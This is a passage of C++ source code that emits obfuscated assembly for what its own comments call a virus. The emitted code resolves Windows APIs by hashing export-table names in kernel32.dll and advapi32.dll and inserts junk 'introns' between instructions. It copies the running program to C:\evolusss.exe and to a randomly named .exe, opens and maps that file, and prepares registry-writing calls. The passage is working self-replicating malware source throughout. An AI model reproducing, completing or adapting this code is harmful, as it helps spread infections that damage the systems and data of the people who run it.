591file << "" << endl;
592GetAddress("mWriteFile");
593file << " _saveWrtOff" << endl; CreateAnIntron();
594zer0(0);
595addnumber("0x078B");
596file << " _writeDWord" << endl; CreateAnIntron();
597file << "" << endl;
598GetAddress("mGetTickCount");
599file << " _saveWrtOff" << endl; CreateAnIntron();
600zer0(0);
601addnumber("0x01B4");
602file << " _writeDWord" << endl; CreateAnIntron();
603file << "" << endl;
604GetAddress("mMapViewOfFile");
605file << " _saveWrtOff" << endl; CreateAnIntron();
606zer0(0);
607addnumber("0x05EE");
608file << " _writeDWord" << endl; CreateAnIntron();
609file << "" << endl;
610GetAddress("mSleep");
611file << " _saveWrtOff" << endl; CreateAnIntron();
612zer0(0);
613addnumber("0x07F9");
614file << " _writeDWord" << endl; CreateAnIntron();
615file << "" << endl;
616GetAddress("mFindFirstFileA");
617file << " _saveWrtOff" << endl; CreateAnIntron();
618zer0(0);
619addnumber("0x094A");
620file << " _writeDWord" << endl; CreateAnIntron();
621file << "" << endl;
622GetAddress("mFindNextFileA");
623file << " _saveWrtOff" << endl; CreateAnIntron();
624zer0(0);
625addnumber("0x0FE1");
626file << " _writeDWord" << endl; CreateAnIntron();
627file << "" << endl;
628GetAddress("mUnmapViewOfFile");
629file << " _saveWrtOff" << endl; CreateAnIntron();
630zer0(0);
631addnumber("0x01D1");
632file << " _writeDWord" << endl; CreateAnIntron();
633file << "" << endl;
634GetAddress("mSetErrorMode");
635file << " _saveWrtOff" << endl; CreateAnIntron();
636zer0(0);
637addnumber("0x0CBB");
638file << " _writeDWord" << endl; CreateAnIntron();
639file << "" << endl;
640GetAddress("mRegCreateKeyA");
641file << " _saveWrtOff" << endl; CreateAnIntron();
642zer0(0);
643addnumber("0x0EDC");
644file << " _writeDWord" << endl; CreateAnIntron();
645file << "" << endl;
646GetAddress("mRegSetValueExA");
647file << " _saveWrtOff" << endl; CreateAnIntron();
648zer0(0);
649addnumber("0x0845");
650file << " _writeDWord" << endl; CreateAnIntron();
651file << "" << endl;
652file << "" << endl;
653GetAddress("stDLLkernel32");
654file << " _saveWrtOff ; to the data-section. This will be used" << endl; CreateAnIntron();
655file << " _nopdA ; by LoadLibraryA as argument later" << endl; CreateAnIntron();
656zer0(0);
657addnumber("\'kern\'");
658file << " _writeDWord" << endl; CreateAnIntron();
659file << "" << endl;
660file << " _nopsA" << endl; CreateAnIntron();
661addnumber("4");
662file << " _saveWrtOff" << endl; CreateAnIntron();
663file << " _nopdA" << endl; CreateAnIntron();
664zer0(0);
665addnumber("\'el32\'");
666file << " _writeDWord" << endl; CreateAnIntron();
667file << "" << endl;
668file << " _nopsA" << endl; CreateAnIntron();
669addnumber("4");
670file << " _saveWrtOff" << endl; CreateAnIntron();
671file << " _nopdA" << endl; CreateAnIntron();
672zer0(0);
673addnumber("\'.dll\'");
674file << " _writeDWord" << endl; CreateAnIntron();
675
676GetAddress("stDLLadvapi32");
677file << " _saveWrtOff" << endl; CreateAnIntron();
678file << " _nopdA" << endl; CreateAnIntron();
679zer0(0);
680addnumber("\'adva\'");
681file << " _writeDWord" << endl; CreateAnIntron();
682
683file << " _nopsA" << endl; CreateAnIntron();
684addnumber("4");
685file << " _saveWrtOff" << endl; CreateAnIntron();
686file << " _nopdA" << endl; CreateAnIntron();
687zer0(0);
688addnumber("\'pi32\'");
689file << " _writeDWord" << endl; CreateAnIntron();
690
691file << " _nopsA" << endl; CreateAnIntron();
692addnumber("4");
693file << " _saveWrtOff" << endl; CreateAnIntron();
694file << " _nopdA" << endl; CreateAnIntron();
695zer0(0);
696addnumber("\'.dll\'");
697file << " _writeDWord" << endl; CreateAnIntron();
698
699
700GetAddress("stDLLkernel32");
701file << " _push" << endl; CreateAnIntron();
702file << " _CallAPILoadLibrary ; invoke LoadLibrary, " << static_cast<char>(34) << "kernel32.dll" << static_cast<char>(34) << "" << endl; CreateAnIntron();
703
704GetAddress("hDLLlibrary32");
705file << " _saveWrtOff" << endl; CreateAnIntron();
706
707
708file << " _nopsA" << endl; CreateAnIntron();
709file << " _writeDWord ; mov dword[hDLLkernel32], eax" << endl; CreateAnIntron();
710
711file << " _save ; Save kernel32.dll position" << endl; CreateAnIntron();
712addnumber("0x3C");
713file << " _getdata ; mov RegB, dword[hDLLkernel32+0x3C]" << endl; CreateAnIntron();
714file << " ; = Pointer to PE Header of kernel32.dll" << endl; CreateAnIntron();
715file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
716
717addnumber("0x78");
718file << " _getdata ; Export Tables" << endl; CreateAnIntron();
719file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
720addnumber("0x1C");
721
722file << " _nopdA ; temporarily save Offset of Addresse Table in RegA" << endl; CreateAnIntron();
723
724GetAddress("hAddressTable");
725file << " _saveWrtOff ; WriteOffset=hAddressTable" << endl; CreateAnIntron();
726
727file << " _nopsA ; restore RegA=Addresse Tables" << endl; CreateAnIntron();
728file << " _getdata ; Pointer To Addresse Table" << endl; CreateAnIntron();
729file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
730file << " _writeDWord ; mov dword[hAddressTable], (Pointer to Addresse Table)" << endl; CreateAnIntron();
731
732GetAddress("hNamePointerTable");
733file << " _saveWrtOff ; WriteOffset=hNamePointerTable" << endl; CreateAnIntron();
734
735file << " _nopsA ; BC1=Addresse Table" << endl; CreateAnIntron();
736addnumber("4");
737file << " _nopdA" << endl; CreateAnIntron();
738
739file << " _getdata ; Pointer To Name Table" << endl; CreateAnIntron();
740file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
741file << " _writeDWord ; mov dword[hNamePointerTable], (Pointer to Name Pointer Table)" << endl; CreateAnIntron();
742
743GetAddress("hOrdinalTable");
744file << " _saveWrtOff ; WriteOffset=hOrdinalTable" << endl; CreateAnIntron();
745
746file << " _nopsA" << endl; CreateAnIntron();
747addnumber("4");
748
749file << " _getdata ; Ordinal Table" << endl; CreateAnIntron();
750file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
751file << " _writeDWord ; mov dword[hOrdinalTable], (Pointer to Ordinal Table)" << endl; CreateAnIntron();
752
753
754
755GetAddress("APINumber");
756file << " _saveWrtOff" << endl; CreateAnIntron();
757zer0(1);
758addnumber("APINumberKernel");
759file << " _writeDWord ; Save number of kernel32.dll APIs" << endl; CreateAnIntron();
760
761
762GetAddress("hAddressePointer");
763file << " _saveWrtOff" << endl; CreateAnIntron();
764GetAddress("APIAddresses");
765file << " _writeDWord ; Saves the AddressePointer" << endl; CreateAnIntron();
766
767
768GetAddress("hMagicNumberPointer");
769file << " _saveWrtOff" << endl; CreateAnIntron();
770GetAddress("APIMagicNumbersKernel");
771file << " _writeDWord ; Saves the MagicNumber Pointer" << endl; CreateAnIntron();
772
773zer0(0);
774addnumber("43");
775file << " _push" << endl; CreateAnIntron();
776
777file << "; FindAllAPIs" << endl; CreateAnIntron();
778file << " _getEIP" << endl; CreateAnIntron();
779file << " _sub0001" << endl; CreateAnIntron();
780file << " _sub0001" << endl; CreateAnIntron();
781file << " _sub0001" << endl; CreateAnIntron();
782file << " _sub0001" << endl; CreateAnIntron();
783file << " _sub0001" << endl; CreateAnIntron();
784file << " _saveJmpOff ; mov BA2, eip - for further API searching in different DLLs" << endl; CreateAnIntron();
785
786file << " _pushall" << endl; CreateAnIntron();
787
788zer0(0);
789file << " _nopdB ; RegB = Counter for first instance loop = 0" << endl; CreateAnIntron();
790
791GetAddress("hAddressePointer");
792file << " _getdata" << endl; CreateAnIntron();
793file << " _nopdA ; RegA = Pointer to Buffer for API Addresse" << endl; CreateAnIntron();
794
795GetAddress("hMagicNumberPointer");
796file << " _getdata" << endl; CreateAnIntron();
797file << " _nopdD ; RegD = Pointer to Magic Numbers for APIs" << endl; CreateAnIntron();
798
799
800
801file << " ; FindAllAPIsNext" << endl; CreateAnIntron();
802file << " _getEIP" << endl; CreateAnIntron();
803file << " _sub0001" << endl; CreateAnIntron();
804file << " _sub0001" << endl; CreateAnIntron();
805file << " _sub0001" << endl; CreateAnIntron();
806file << " _sub0001" << endl; CreateAnIntron();
807file << " _sub0001" << endl; CreateAnIntron();
808file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
809
810
811file << " _pushall" << endl; CreateAnIntron();
812file << " ; RegA=free | used for pointer within the Name Pointer Table" << endl; CreateAnIntron();
813file << " ; RegB=free | used as temporary buffer" << endl; CreateAnIntron();
814file << " ; RegD=MagicNumber for API" << endl; CreateAnIntron();
815file << " ; Stack: | counter (number of APIs checked in kernel32.dll)" << endl; CreateAnIntron();
816
817GetAddress("hNamePointerTable");
818file << " _getdata" << endl; CreateAnIntron();
819file << " _nopdA ; Pointer to Name Pointer Table (points to first API)" << endl; CreateAnIntron();
820
821zer0(0);
822file << " _sub0001" << endl; CreateAnIntron();
823file << " _push ; counter" << endl; CreateAnIntron();
824
825file << " ; SearchNextAPI:" << endl; CreateAnIntron();
826file << " _getEIP" << endl; CreateAnIntron();
827file << " _sub0001" << endl; CreateAnIntron();
828file << " _sub0001" << endl; CreateAnIntron();
829file << " _sub0001" << endl; CreateAnIntron();
830file << " _sub0001" << endl; CreateAnIntron();
831file << " _sub0001" << endl; CreateAnIntron();
832file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
833
834file << " _pop" << endl; CreateAnIntron();
835addnumber("0x1");
836file << " _push" << endl; CreateAnIntron();
837
838GetAddress("hDLLlibrary32");
839file << " _getdata" << endl; CreateAnIntron();
840file << " _save ; kernel32.dll position" << endl; CreateAnIntron();
841
842file << " _nopsA ; Pointer to NamePointerTable" << endl; CreateAnIntron();
843file << " _getdata ; Points to API name" << endl; CreateAnIntron();
844file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
845file << " _sub0001 ; -- (for algorithm)" << endl; CreateAnIntron();
846file << " _nopdB ; save Pointer to API name" << endl; CreateAnIntron();
847
848
849file << " _nopsA" << endl; CreateAnIntron();
850addnumber("4");
851file << " _nopdA ; Has just effects in next loop" << endl; CreateAnIntron();
852
853file << " _pushall" << endl; CreateAnIntron();
854zer0(0);
855file << " _nopdA" << endl; CreateAnIntron();
856
857file << " _getEIP" << endl; CreateAnIntron();
858file << " _sub0001" << endl; CreateAnIntron();
859file << " _sub0001" << endl; CreateAnIntron();
860file << " _sub0001" << endl; CreateAnIntron();
861file << " _sub0001" << endl; CreateAnIntron();
862file << " _sub0001" << endl; CreateAnIntron();
863file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
864
865file << " _nopsA" << endl; CreateAnIntron();
866file << " _save ; RegA=MagicNumber" << endl; CreateAnIntron();
867
868file << " _nopsB" << endl; CreateAnIntron();
869addnumber("1");
870file << " _nopdB ; BC1=NamePointer++" << endl; CreateAnIntron();
871
872file << " _getdata ; BC1=dword[NamePointer+n]" << endl; CreateAnIntron();
873
874file << " _addsaved ; BC1=BC1 + BC2 = dword[NamePointer+n] xor MagicNumber" << endl; CreateAnIntron();
875file << " _nopdA" << endl; CreateAnIntron();
876
877zer0(0);
878addnumber("8");
879file << " _save" << endl; CreateAnIntron();
880
881file << " _nopsB" << endl; CreateAnIntron();
882file << " _getdata ; BC1=nxxx" << endl; CreateAnIntron();
883file << " _shr ; BC1=???n" << endl; CreateAnIntron();
884file << " _push" << endl; CreateAnIntron();
885
886zer0(0);
887addnumber("0xFF");
888file << " _save ; BC2=0xFF" << endl; CreateAnIntron();
889file << " _pop ; BC1=???n" << endl; CreateAnIntron();
890file << " _and ; BC1=000n" << endl; CreateAnIntron();
891
892file << " _JnzUp" << endl; CreateAnIntron();
893
894GetAddress("APITmpBuffer");
895file << " _saveWrtOff" << endl; CreateAnIntron();
896file << " _nopsA" << endl; CreateAnIntron();
897file << " _writeDWord ; mov dword[APITmpBuffer], RegA" << endl; CreateAnIntron();
898
899file << " _popall" << endl; CreateAnIntron();
900
901GetAddress("APITmpBuffer");
902file << " _getdata" << endl; CreateAnIntron();
903file << " _nopdB ; save MagicNumber of this API" << endl; CreateAnIntron();
904
905
906zer0(0);
907addnumber("0x0FFF");
908file << " _save ; save 0x0FFF in BC2" << endl; CreateAnIntron();
909
910file << " _nopsB" << endl; CreateAnIntron();
911file << " _and ; BC1=dword[MagicNumberOfThisAPI] && 0x0FFF" << endl; CreateAnIntron();
912file << " _nopdB" << endl; CreateAnIntron();
913
914file << " _nopsD ; Get Pointer to API MagicWord" << endl; CreateAnIntron();
915file << " _getdata" << endl; CreateAnIntron();
916file << " _and ; BC1=dword[MagicNumberSearchAPI] && 0x0FFF" << endl; CreateAnIntron();
917file << " _save ; save" << endl; CreateAnIntron();
918
919file << " _nopsB ; Get MagicNumber of current API again" << endl; CreateAnIntron();
920file << " _xor ; (dword[MagicNumberSearchAPI] && 0x0FFF) XOR dword[MagicNumberOfThisAPI] && 0x0FFF" << endl; CreateAnIntron();
921file << " ; If zero, assume that we found API" << endl; CreateAnIntron();
922file << " _JnzUp" << endl; CreateAnIntron();
923
924
925zer0(0);
926addnumber("1");
927file << " _save ; BC2=1" << endl; CreateAnIntron();
928
929file << " _pop ; Get Counter from Stack" << endl; CreateAnIntron();
930file << " _shl ; BC1=counter*2 (because Ordinal Table has just 2byte Entries)" << endl; CreateAnIntron();
931file << " ; (=no DLLs with more than 65535 functions?!)" << endl; CreateAnIntron();
932file << " _save" << endl; CreateAnIntron();
933
934GetAddress("hOrdinalTable");
935file << " _getdata" << endl; CreateAnIntron();
936file << " _addsaved ; Points to ordinal number of the API" << endl; CreateAnIntron();
937
938file << " _push" << endl; CreateAnIntron();
939zer0(0);
940addnumber("0xFFFF");
941file << " _save" << endl; CreateAnIntron();
942file << " _pop ; BC2=0xFFFF" << endl; CreateAnIntron();
943
944file << " _getdata ; BC1=Ordinal Number of API" << endl; CreateAnIntron();
945file << " ; Ordinal Number is a word, so we have to set the high word to zero" << endl; CreateAnIntron();
946file << " _and ; BC1=dword[Ordinal] && 0xFFFF" << endl; CreateAnIntron();
947
948file << " _push" << endl; CreateAnIntron();
949zer0(0);
950addnumber("2");
951file << " _save" << endl; CreateAnIntron();
952file << " _pop" << endl; CreateAnIntron();
953file << " _shl ; BC1=Ordinal*4, as Addresse to Function is a dword" << endl; CreateAnIntron();
954
955file << " _save" << endl; CreateAnIntron();
956
957GetAddress("hAddressTable");
958file << " _getdata" << endl; CreateAnIntron();
959
960file << " _addsaved ; BC1 points to Addresse of API Function" << endl; CreateAnIntron();
961file << " _getdata ; BC1=Addresse of API Function" << endl; CreateAnIntron();
962file << " _save" << endl; CreateAnIntron();
963
964GetAddress("hDLLlibrary32");
965file << " _getdata" << endl; CreateAnIntron();
966file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
967file << " ; BC1 contains the Addresse of the API in (kernel32) memory" << endl; CreateAnIntron();
968
969
970file << " _nopdB ; save the Addresse in RegB" << endl; CreateAnIntron();
971GetAddress("hAddressePointer");
972file << " _getdata ; Pointer to the buffer where we save the API addresse" << endl; CreateAnIntron();
973file << " _saveWrtOff ; We will write to this Addresse" << endl; CreateAnIntron();
974
975file << " _nopsB ; restore API Addresse" << endl; CreateAnIntron();
976
977file << " _writeDWord ; Save the API Function Addresse in the Function Buffer!!!" << endl; CreateAnIntron();
978
979
980file << " _popall" << endl; CreateAnIntron();
981
982GetAddress("hAddressePointer");
983file << " _saveWrtOff ; The buffer where we save the pointer" << endl; CreateAnIntron();
984
985file << " _nopsA" << endl; CreateAnIntron();
986addnumber("0x4");
987
988file << " _writeDWord ; save pointer" << endl; CreateAnIntron();
989file << " _nopdA ; save different (prevents a more messy code)" << endl; CreateAnIntron();
990
991file << " _nopsD ; Next Magic Number for API" << endl; CreateAnIntron();
992addnumber("0x4");
993file << " _nopdD" << endl; CreateAnIntron();
994
995file << " _nopsB" << endl; CreateAnIntron();
996addnumber("0x1");
997file << " _nopdB" << endl; CreateAnIntron();
998file << " _save" << endl; CreateAnIntron();
999
1000GetAddress("APINumber");
1001file << " _getdata" << endl; CreateAnIntron();
1002
1003
1004subsaved(0);
1005file << " _JnzUp ; Jnz FindAllAPIsNext" << endl; CreateAnIntron();
1006
1007file << " ; end FindAllAPIsNext" << endl; CreateAnIntron();
1008
1009file << " _popall" << endl; CreateAnIntron();
1010file << " ; FoundAPI" << endl; CreateAnIntron();
1011
1012file << "; end FindAllAPIs in kernel32.dll" << endl; CreateAnIntron();
1013
1014GetAddress("stDLLadvapi32");
1015file << " _push" << endl; CreateAnIntron();
1016file << " _CallAPILoadLibrary ; invoke LoadLibrary, " << static_cast<char>(34) << "kernel32.dll" << static_cast<char>(34) << "" << endl; CreateAnIntron();
1017
1018
1019GetAddress("hDLLlibrary32");
1020file << " _saveWrtOff" << endl; CreateAnIntron();
1021
1022
1023file << " _nopsA" << endl; CreateAnIntron();
1024file << " _writeDWord ; mov dword[hDLLkernel32], eax" << endl; CreateAnIntron();
1025
1026file << " _save ; Save kernel32.dll position" << endl; CreateAnIntron();
1027
1028addnumber("0x3C");
1029file << " _getdata ; mov RegB, dword[hDLLkernel32+0x3C]" << endl; CreateAnIntron();
1030
1031file << " ; = Pointer to PE Header of kernel32.dll" << endl; CreateAnIntron();
1032file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1033
1034addnumber("0x78");
1035file << " _getdata ; Export Tables" << endl; CreateAnIntron();
1036file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1037addnumber("0x1C");
1038
1039file << " _nopdA ; temporarily save Offset of Addresse Table in RegA" << endl; CreateAnIntron();
1040
1041GetAddress("hAddressTable");
1042file << " _saveWrtOff ; WriteOffset=hAddressTable" << endl; CreateAnIntron();
1043
1044file << " _nopsA ; restore RegA=Addresse Tables" << endl; CreateAnIntron();
1045file << " _getdata ; Pointer To Addresse Table" << endl; CreateAnIntron();
1046file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1047file << " _writeDWord ; mov dword[hAddressTable], (Pointer to Addresse Table)" << endl; CreateAnIntron();
1048
1049GetAddress("hNamePointerTable");
1050file << " _saveWrtOff ; WriteOffset=hNamePointerTable" << endl; CreateAnIntron();
1051
1052file << " _nopsA ; BC1=Addresse Table" << endl; CreateAnIntron();
1053addnumber("4");
1054file << " _nopdA" << endl; CreateAnIntron();
1055
1056file << " _getdata ; Pointer To Name Table" << endl; CreateAnIntron();
1057file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1058file << " _writeDWord ; mov dword[hNamePointerTable], (Pointer to Name Pointer Table)" << endl; CreateAnIntron();
1059
1060GetAddress("hOrdinalTable");
1061file << " _saveWrtOff ; WriteOffset=hOrdinalTable" << endl; CreateAnIntron();
1062
1063file << " _nopsA" << endl; CreateAnIntron();
1064addnumber("4");
1065
1066file << " _getdata ; Ordinal Table" << endl; CreateAnIntron();
1067file << " _addsaved ; relative -> absolut" << endl; CreateAnIntron();
1068file << " _writeDWord ; mov dword[hOrdinalTable], (Pointer to Ordinal Table)" << endl; CreateAnIntron();
1069
1070
1071GetAddress("APINumber");
1072file << " _saveWrtOff" << endl; CreateAnIntron();
1073zer0(0);
1074addnumber("APINumberAdvapi");
1075file << " _writeDWord ; Save number of kernel32.dll APIs" << endl; CreateAnIntron();
1076
1077GetAddress("hAddressePointer");
1078file << " _saveWrtOff" << endl; CreateAnIntron();
1079GetAddress("APIAddressesReg");
1080file << " _writeDWord ; Saves the AddressePointer" << endl; CreateAnIntron();
1081
1082
1083GetAddress("hMagicNumberPointer");
1084file << " _saveWrtOff" << endl; CreateAnIntron();
1085GetAddress("APIMagicNumbersReg");
1086file << " _writeDWord ; Saves the MagicNumber Pointer" << endl; CreateAnIntron();
1087
1088
1089zer0(0);
1090addnumber("42");
1091file << " _save" << endl; CreateAnIntron();
1092file << " _pop" << endl; CreateAnIntron();
1093file << " _sub0001" << endl; CreateAnIntron();
1094file << " _push" << endl; CreateAnIntron();
1095addnumber("1");
1096file << " _xor" << endl; CreateAnIntron();
1097file << " _JnzUp" << endl; CreateAnIntron();
1098
1099file << " _pop ; Remove trash from stack" << endl; CreateAnIntron();
1100
1101
1102zer0(0);
1103addnumber("0x8007");
1104file << " _push" << endl; CreateAnIntron();
1105CallAPI("hSetErrorMode");
1106
1107CallAPI("hGetTickCount");
1108
1109
1110file << "; ############################################################################" << endl; CreateAnIntron();
1111file << "; ############################################################################" << endl; CreateAnIntron();
1112file << "; ############################################################################" << endl; CreateAnIntron();
1113file << "; #####" << endl; CreateAnIntron();
1114file << "; ##### First child ..." << endl; CreateAnIntron();
1115file << "; #####" << endl; CreateAnIntron();
1116
1117
1118GetAddress("RandomNumber");
1119file << " _saveWrtOff" << endl; CreateAnIntron();
1120file << " _nopsA" << endl; CreateAnIntron();
1121file << " _writeDWord ; mov dword[RandomNumber], RegA" << endl; CreateAnIntron();
1122
1123zer0(0);
1124file << " _nopdB ; mov RegB, 0" << endl; CreateAnIntron();
1125
1126
1127file << "; RndNameLoop:" << endl; CreateAnIntron();
1128file << " _getEIP" << endl; CreateAnIntron();
1129file << " _sub0001" << endl; CreateAnIntron();
1130file << " _sub0001" << endl; CreateAnIntron();
1131file << " _sub0001" << endl; CreateAnIntron();
1132file << " _sub0001" << endl; CreateAnIntron();
1133file << " _sub0001" << endl; CreateAnIntron();
1134file << " _saveJmpOff ; mov esi, eip" << endl; CreateAnIntron();
1135
1136GetAddress("RandomNumber");
1137
1138file << " _getdata" << endl; CreateAnIntron();
1139file << " _nopdA ; mov eax, [RandomNumber]" << endl; CreateAnIntron();
1140
1141
1142zer0(0);
1143file << " _nopdD ; mov edx, 0" << endl; CreateAnIntron();
1144
1145addnumber("26");
1146
1147file << " _div ; div ebx" << endl; CreateAnIntron();
1148
1149file << " _nopsD" << endl; CreateAnIntron();
1150addnumber("97");
1151file << " _nopdD ; add edx, 97" << endl; CreateAnIntron();
1152
1153file << " _nopsB ; ebx=ebp=count" << endl; CreateAnIntron();
1154file << " _save ; ebp=ebx=ecx=count" << endl; CreateAnIntron();
1155
1156GetAddress("RandomFileName");
1157file << " ; ebx=rfn, ebp=ecx=count" << endl; CreateAnIntron();
1158file << " _addsaved ; ebx=rfn+count, ebp=ecx=count" << endl; CreateAnIntron();
1159file << " _saveWrtOff ; edi=rfn+count, ebx=rfn+count, ebp=ecx=count" << endl; CreateAnIntron();
1160
1161
1162file << " _nopsD" << endl; CreateAnIntron();
1163file << " _writeByte ; mov byte[ecx+RandomFileName], dl" << endl; CreateAnIntron();
1164
1165CalcNewRandNumberAndSaveIt();
1166
1167file << " _nopsB" << endl; CreateAnIntron();
1168addnumber("1");
1169file << " _nopdB" << endl; CreateAnIntron();
1170file << " _save ; inc counter" << endl; CreateAnIntron();
1171
1172zer0(1);
1173addnumber("8");
1174subsaved(0);
1175
1176
1177file << " _JnzUp ; jnz esi" << endl; CreateAnIntron();
1178file << "; loop RndNameLoop" << endl; CreateAnIntron();
1179
1180GetAddress("rndext");
1181file << " _saveWrtOff" << endl; CreateAnIntron();
1182zer0(0);
1183addnumber("\'.exe\'");
1184file << " _writeDWord ; create extention" << endl; CreateAnIntron();
1185
1186CallAPI("hGetCommandLineA");
1187zer0(0);
1188addnumber("0xFF");
1189file << " _save" << endl; CreateAnIntron();
1190
1191file << " _nopsA" << endl; CreateAnIntron();
1192file << " _getdata" << endl; CreateAnIntron();
1193file << " _and" << endl; CreateAnIntron();
1194
1195file << " _nopdB ; RegB=1st byte of filename" << endl; CreateAnIntron();
1196zer0(0);
1197addnumber("34");
1198file << " _nopdD ; RegD=34" << endl; CreateAnIntron();
1199
1200
1201file << " _nopsB" << endl; CreateAnIntron();
1202file << " _save" << endl; CreateAnIntron();
1203file << " _nopsD" << endl; CreateAnIntron();
1204subsaved(0);
1205
1206file << " _JnzDown" << endl;
1207file << " _nopsA" << endl;
1208file << " _add0001" << endl;
1209file << " _nopdA" << endl;
1210file << " _nopREAL" << endl;
1211
1212file << " _nopsA" << endl; CreateAnIntron();
1213file << " _push ; Save RegA at stack" << endl; CreateAnIntron();
1214
1215file << "; FindEndOfString:" << endl; CreateAnIntron();
1216file << " _getEIP" << endl; CreateAnIntron();
1217file << " _sub0001" << endl; CreateAnIntron();
1218file << " _sub0001" << endl; CreateAnIntron();
1219file << " _sub0001" << endl; CreateAnIntron();
1220file << " _sub0001" << endl; CreateAnIntron();
1221file << " _sub0001" << endl; CreateAnIntron();
1222file << " _saveJmpOff ; mov esi, eip" << endl; CreateAnIntron();
1223
1224file << " _nopsA" << endl; CreateAnIntron();
1225addnumber("1");
1226file << " _nopdA" << endl; CreateAnIntron();
1227
1228zer0(0);
1229addnumber("0xFF");
1230file << " _save" << endl; CreateAnIntron();
1231file << " _nopsA" << endl; CreateAnIntron();
1232file << " _getdata" << endl; CreateAnIntron();
1233file << " _and" << endl; CreateAnIntron();
1234file << " _nopdD ; RegD=(dword[Name+count]&& 0xFF)" << endl; CreateAnIntron();
1235
1236zer0(0);
1237addnumber("34");
1238file << " _save" << endl; CreateAnIntron();
1239file << " _nopsB ; 1st Byte of filename" << endl; CreateAnIntron();
1240subsaved(1);
1241
1242file << " _JnzDown" << endl;
1243file << " _nopsD" << endl;
1244file << " _xor" << endl;
1245file << " _JnzUp" << endl;
1246file << " _nopREAL" << endl;
1247file << "; EndFindEndOfString:" << endl; CreateAnIntron();
1248
1249file << " _nopsA" << endl; CreateAnIntron();
1250file << " _saveWrtOff" << endl; CreateAnIntron();
1251
1252zer0(1);
1253addnumber("34");
1254file << " _nopsB ; 1st Byte of filename" << endl; CreateAnIntron();
1255subsaved(0);
1256file << " _JnzDown" << endl;
1257file << " _save" << endl;
1258file << " _xor" << endl;
1259file << " _writeByte" << endl;
1260file << " _nopREAL" << endl;
1261
1262file << " _pop" << endl; CreateAnIntron();
1263file << " _nopdA" << endl; CreateAnIntron();
1264
1265
1266GetAddress("Driveletter3-1");
1267file << " _saveWrtOff" << endl; CreateAnIntron();
1268zer0(0);
1269addnumber("0x5C3A4300");
1270file << " _writeDWord" << endl; CreateAnIntron();
1271
1272GetAddress("virusname");
1273file << " _saveWrtOff" << endl; CreateAnIntron();
1274zer0(0);
1275addnumber("\'evol\'");
1276file << " _writeDWord" << endl; CreateAnIntron();
1277
1278GetAddress("virusname+4");
1279file << " _saveWrtOff" << endl; CreateAnIntron();
1280zer0(0);
1281addnumber("\'usss\'");
1282file << " _writeDWord ; Construct virusfilename" << endl; CreateAnIntron();
1283
1284GetAddress("virext");
1285file << " _saveWrtOff" << endl; CreateAnIntron();
1286zer0(0);
1287addnumber("\'.exe\'");
1288file << " _writeDWord ; create extention" << endl; CreateAnIntron();
1289
1290file << " _nopsA" << endl; CreateAnIntron();
1291file << " _push ; Save pointer to filename buffer" << endl; CreateAnIntron();
1292zer0(0);
1293file << " _push" << endl; CreateAnIntron();
1294GetAddress("Driveletter3");
1295file << " _push" << endl; CreateAnIntron();
1296file << " _nopsA" << endl; CreateAnIntron();
1297file << " _push" << endl; CreateAnIntron();
1298CallAPI("hCopyFileA");
1299
1300file << " _pop" << endl; CreateAnIntron();
1301file << " _nopdA" << endl; CreateAnIntron();
1302zer0(0);
1303file << " _push" << endl; CreateAnIntron();
1304GetAddress("RandomFileName");
1305file << " _push" << endl; CreateAnIntron();
1306file << " _nopsA" << endl; CreateAnIntron();
1307file << " _push" << endl; CreateAnIntron();
1308CallAPI("hCopyFileA");
1309
1310zer0(0);
1311file << " _push" << endl; CreateAnIntron();
1312file << " _push" << endl; CreateAnIntron();
1313addnumber("3");
1314file << " _push" << endl; CreateAnIntron();
1315zer0(0);
1316file << " _push" << endl; CreateAnIntron();
1317addnumber("1");
1318file << " _push" << endl; CreateAnIntron();
1319file << " _sub0001" << endl; CreateAnIntron();
1320addnumber("0xC0000000");
1321file << " _push" << endl; CreateAnIntron();
1322GetAddress("RandomFileName");
1323file << " _push" << endl; CreateAnIntron();
1324CallAPI("hCreateFileA");
1325
1326
1327GetAddress("FileHandle");
1328file << " _saveWrtOff" << endl; CreateAnIntron();
1329file << " _nopsA" << endl; CreateAnIntron();
1330file << " _writeDWord ; mov dword[FileHandle], RegA" << endl; CreateAnIntron();
1331
1332file << " _save" << endl; CreateAnIntron();
1333
1334GetAddress("FileSize");
1335
1336file << " _push" << endl; CreateAnIntron();
1337zer0(1);
1338file << " _addsaved" << endl; CreateAnIntron();
1339file << " _push" << endl; CreateAnIntron();
1340CallAPI("hGetFileSize");
1341
1342GetAddress("FileSize");
1343file << " _saveWrtOff" << endl; CreateAnIntron();
1344file << " _nopsA" << endl; CreateAnIntron();
1345file << " _writeDWord ; mov dword[FileSize], RegA" << endl; CreateAnIntron();
1346
1347zer0(1);
1348file << " _push" << endl; CreateAnIntron();
1349file << " _addsaved" << endl; CreateAnIntron();
1350file << " _push" << endl; CreateAnIntron();
1351zer0(0);
1352file << " _push" << endl; CreateAnIntron();
1353addnumber("4");
1354file << " _push" << endl; CreateAnIntron();
1355zer0(0);
1356file << " _push" << endl; CreateAnIntron();
1357GetAddress("FileHandle");
1358file << " _getdata" << endl; CreateAnIntron();
1359file << " _push" << endl; CreateAnIntron();
1360CallAPI("hCreateFileMappingA");
1361
1362GetAddress("MapHandle");
1363
1364file << " _saveWrtOff" << endl; CreateAnIntron();
1365file << " _nopsA" << endl; CreateAnIntron();
1366file << " _writeDWord ; mov dword[MapHandle], RegA" << endl; CreateAnIntron();
1367
1368file << " _save" << endl; CreateAnIntron();
1369GetAddress("FileSize");
1370
1371file << " _getdata" << endl; CreateAnIntron();
1372file << " _push ; [FileSize]" << endl; CreateAnIntron();
1373zer0(1);
1374file << " _push ; 0" << endl; CreateAnIntron();
1375file << " _push ; 0" << endl; CreateAnIntron();
1376addnumber("2");
1377file << " _push" << endl; CreateAnIntron();
1378zer0(1);
1379file << " _addsaved" << endl; CreateAnIntron();
